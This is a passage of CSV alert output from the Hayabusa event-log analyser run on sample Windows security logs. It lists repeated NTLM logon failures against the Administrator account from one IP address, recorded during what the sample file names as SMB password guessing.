2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: umU8pDDZFvvUVsHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nn7rA0uRegtHgaF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dgiakCKweT4GUGD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kptipiLujNVePYfy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: plaXJ1rEGpU3SzV2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I4pALF2luLfg36GC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.173 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZLO4cufbFcRhRy8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.215 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a845OfrFKxy31Yhg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QnPM7uhs8y4BaP6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fW5FzQ4jbWDJxXc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.326 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: huKy3ruTPAlx94pI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g78Kx7hkMuUGIoX1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: erSXtXvMi8Cg1PWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.462 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VaqXgO2US87zoXLl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.501 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHEfAfFuAR2pX3LO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4Owk2elGaC5DOm1U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VXPynWzVNADN56a4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwfwZ0hXFaFwqymH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QYlZwLsvrsuqUZ4q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.707 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pvGrzr30eVl5TGhA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.791 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tqdJcHWbdGcIIHBr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDt69bIJ1yI6PXLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtE2uMuOe8QPAKOj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BWQDlZDgFj9NmMhJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:20.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ncQiyLyHCXr8knGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XjVmLfmcPMYbmdin | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.072 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gU2HjzjDxHsnvENI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cUPn5CEz2LtwRwvZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hCz069oBFXqpshbU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dzhc9PVRVP69tshD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ejA3ZNfKWEs8zAMX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U5egiL2PGOrYCHv5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YYhIM3zla6KcbKbM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WjyQJnVBO4iC9Tkw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g6Tpp8TRa2nRxHzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DyLvo5Bn2HzyANdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaXNThuZDGqJ7oCP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 42Sb7p19cQsEV30b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: An6629wgflzSgqY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iO7JktEihqddmEtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nG97BFOgKxnZaqi4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SH2D24c6nRGDL4Oe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiu2yfaM2JQQZoLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YQx9PG8DtR2tMjvS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OoAWryajKhLD7RyY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgewSeaVugP1TXss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sPMCPdCAnz4upz8X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dUbV6xnGeBWE8Dif | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIJ9mZczFO1GKItV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wW0vxE4o68L70Sra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOn9DzB1yWtntyX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m9uGgocAVReiJWDm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qm9Jf1fles2HOb3g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ev5eTWdf3CskOMuh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoiMO6sSLOm4fOD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDjvMsa2IgR9KO7l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SR7gVjxHZDYeK7pJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4jzGAepr7JeNKuuk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:22.368 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H9baxEeRCWjx6Fzr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uy7aTt0B4ErguacA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.830 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: 
